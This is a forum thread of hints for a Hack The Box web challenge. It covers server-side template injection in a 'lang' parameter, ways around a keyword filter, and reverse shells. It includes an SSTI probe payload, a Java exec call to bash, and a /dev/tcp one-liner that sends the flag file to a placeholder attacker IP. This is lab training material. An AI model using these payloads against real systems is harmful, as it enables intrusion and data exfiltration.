Breathtaking View Discussion [HTB] [WEB] [HINTS]

Let’s discuss Breathtaking View. Please do not share any flags or writeups.

The lang parameter is vulnerable to SSTI.

Check this source to prepare a payload.

Get some ideas here to bypass the word java filter.

For a reverse shell command, you can refer to this repository.

Is there an extra step to be done with the lang payload? None of the examples work.

There’s no. Just register, URL encode and put the payload in the lang parameter. Those websites don’t contain the final payload but you can mix them to obtain it

Exclusive content is now available for Breathtaking View.

What is Exclusive Content?


You can still ask for help and specific hints in this thread.

Thanks. I still can’t see a processed string in the error page. Will keep trying!

Start trying with simple payloads.

__*${7*7}__::.x

Do we need to upload nc?

No actually. With a exec template injection payload and a proper reverse shell command you can get directly a reverse shell.

Is there a way to solve challenge without reverse shell? Gave up after I couldnt create right objects…

I am not sure because the container doesn’t useful binaries including nc, wget, curl. It’s very hard to transfer files even if you can execute commands. Directly getting shell is possible. Can you execute commands?

Yes, you can pass subshell commands to the exec like: new String[] { "/bin/bash", "-c", "what ever command" }. (I think it’s better then just command string).

Anyway, huge wtf when I discovered that challenge has a solution script inside, lol. And it doesnt use reverse shell, just Java code.

Really ? Then what’s the way to get the flag without getting a reverse shell? I tried to copy the flag to the templates directory but I think the server doesn’t read from this directory. Probably real templates are inside the jar file.

same, I tried to read the flag, but couldn’t. Rev shell works though

I found a way without getting shell like this:

bash -c cat${IFS}/flag*>&/dev/tcp/YOUR_IP/1234<&1

Listen the port.

It’ll send the flag .

I was trying to read it without using listening port :stuck_out_tongue_winking_eye:

A little more research on Java built-in modules may help us to find the way you want. I’ll check it again later.

Yes, Java is compiled into Jar file and that’s the server, no live modification can be done by us.

Without rev shell some Java knowledge is required. java.io.File has listFiles method to get file names. java.nio.Files has method readAllLines. Now you just need to piece together code and ~templatify it. (Maybe in single request or multiple)

Thx!

(Do we even need the filenames here? /app/flag.txt is still there due to “COPY . /app” in the Dockerfile …)

Yeah… && rm /flag.txt is incorrect.
Why cp && rm when mv exists… I see really bad code practices on HTB :smiley: